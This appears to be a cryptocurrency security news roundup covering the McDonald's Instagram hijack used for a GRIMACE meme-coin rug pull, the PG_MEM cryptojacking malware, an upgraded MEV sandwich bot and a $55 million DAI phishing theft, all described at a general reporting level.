McDonald’s Instagram Hacked, Scammers Steal $700,000 in Solana

Scammers stole $700K in Solana after hacking into the Instagram account of McDonald’s and promoting a fraudulent token named GRIMACE.

McDonald’s official Instagram account was hacked on Aug. 21. The hacked account promoted a fraudulent meme coin named “Grimace,” and the scammers got away with thousands of dollars worth of SOL.  Meanwhile, new threats like the PG_MEM malware are targeting PostgreSQL-managed databases, while the notorious MEV bot “jaredfromsubway.eth” has resurfaced with upgraded capabilities.

Social Media Hack Results in $700,000 Solana Heist

On Aug. 21, the official Instagram account of McDonald’s got hacked, and the attackers managed to steal more than $700,000 in Solana (SOL)  by promoting a fraudulent meme coin named “Grimace.” The scammers took advantage of McDonald’s very large social media following of close to 5.1 million followers to falsely advertise the token as a legitimate experiment by the fast food giant on the Solana blockchain.

Screenshots shared on X revealed that the hackers posted several updates about the token, and used McDonald’s iconic purple mascot, Grimace, to lure investors. Blockchain analytics service Bubblemaps reported that the hackers initially acquired 75% of the Grimace token’s total circulating supply through a Solana meme coin deployer called Pump.fun. They then dispersed these tokens across approximately 100 different wallets.

DexScreener data revealed that the fraudulent promotion caused the Grimace token’s market cap to skyrocket from just a few thousand dollars to $25 million in just 30 minutes. However, the surge was quite short-lived as the hackers very quickly dumped their holdings.

After executing the scam, the hackers edited McDonald’s Instagram bio to brag about their success. They also shared that they netted $700,000 in Solana from the rug pull. The posts and the altered bio were eventually removed, and McDonald’s was able to regain control of their account.

Screenshot of McDonald’s hacked account (Source: X)

In response to the incident, McDonald’s issued a statement to the New York Post, and called the hack an “isolated incident” affecting its social media accounts. The company also assured people that the issue is resolved and apologized for any offensive content that was posted during the hack.

New Cryptojacking Threat

It is not just social media hacks pestering the crypto community. A new malware named PG_MEM has been discovered, and it is targeting PostgreSQL-managed databases to install cryptocurrency mining software. This malware poses a huge threat to the more than 800,000 PostgreSQL databases worldwide, particularly those with weak passwords

The attack starts with a brute force attempt to find a weak password. This allows the threat actor to gain access to the database. Once inside, the attacker creates a new user with high privileges, downloads files from their server, and secures the system to prevent other threat actors from exploiting the same database.

The malware then connects to a mining pool, and uses the database’s computing resources to mine cryptocurrency. This is known as cryptojacking. Concerningly, these kinds of attacks are becoming more and more common. In fact, there has been a 400% rise in crypto-malware attacks in the first half of 2023 compared to the previous year. 

PG_MEM attack flow (Source: Aqua)

PG_MEM is particularly concerning because it exploits a very common vulnerability in internet-facing databases. This vulnerability is weak passwords that result from misconfigurations and inadequate identity controls. Many organizations inadvertently expose their databases to these kinds of risks by connecting them to the internet without enough security measures.

While cryptojacking is mostly seen as a threat, there are some who see potential in harnessing unused computing capacity for legitimate purposes. Companies like Aethir, which provides decentralized cloud infrastructure, use similar methods to offer scalable and cost-effective computing services by aggregating unused GPU capacity from data centers. 

Revamped MEV Bot Targets DeFi Protocols

The infamous maximal extractable value (MEV) bot, known as “jaredfromsubway.eth,” has resurfaced with some new capabilities that allows it to execute more complex “sandwich” attacks on decentralized finance (DeFi) protocols. This bot earned millions of dollars through arbitrage and sandwich attacks earlier in 2023, but has now been upgraded with new strategies that make it even more formidable.

On Aug. 20, MEV tracking site EigenPhi shared that a new MEV contract linked to the bot has emerged, which now employs sophisticated multi-layered sandwich attacks. These attacks involve scheduling transactions both in front of and behind a victim’s transaction to manipulate prices and extract profits at the expense of the victim. Over the past two weeks, this new contract has been seen using a number of advanced on-chain trade-squeezing methods.

The bot operates by exploiting vulnerabilities in DeFi protocols, especially on Uniswap V3 pools, where it executes multiple transactions in the same block to manipulate exchange rates. This results in profits for the bot while causing losses for other users. 

The upgraded bot is called “Jared 2.0,” and now incorporates the addition and removal of liquidity in the decentralized exchange (DEX) pool as part of its sandwich attacks. This new tactic complicates the analysis and tracking of its profitability.

According to EigenPhi, the original jaredfromsubway contract address facilitated trading strategies that paid out close to $2.2 million to other bots or traders over a two-week period starting on Aug. 1. However, activity on this contract started declining on Aug. 7, and eventually dropped to zero on Aug. 14.

MEV attack volume (Source: EigenPhi)

Despite the reduced activity on the original contract, sandwich attack volume passed $17 billion in the past month alone.

Crypto Whale Loses $55M to Phishing Scam

Meanwhile, a crypto whale lost $55 million in stablecoins after a phishing attack on Aug. 20. The incident happened when the wallet owner unknowingly signed a malicious transaction, which resulted in the transfer of 55.47 million DAI to a phishing address in the decentralized finance protocol Maker. 

The whale realized their mistake and tried to withdraw the funds to a new address, but this unfortunately did not work  as the ownership of the wallet’s stablecoins had already been transferred.

Blockchain analytics firm Lookonchain quickly flagged the incident, and revealed that the attackers exchanged 27.5 million DAI for 10,625 ETH after setting the wallet's ownership to a newly created address. 

Phishing attacks are a huge threat in the crypto space. They usually deceive victims into signing malicious transactions or installing fake software, which then leads to the theft of digital assets. 

These attacks have caused a lot of financial damage in 2024 already, with nearly half a billion dollars lost in the first half of the year alone. On July 3, blockchain security firm CertiK reported that $498 million had been lost to phishing attacks. 

Luckily, some steps are being taken to fight these kinds of attacks. The Australian Federal Police (AFP) announced on Aug. 4 that it was investigating losses from phishing scams that affected 2,000 Australian-owned digital asset wallets. 

This is happening after findings by analytics firm Chainalysis uncovered that these wallets had been targeted by "approval phishing" tactics. In response, the Australian Securities and Investments Commission (ASIC) reported that it took down over 5,530 fake investment platforms, 1,065 phishing links, and 615 crypto investment scams since July of 2023.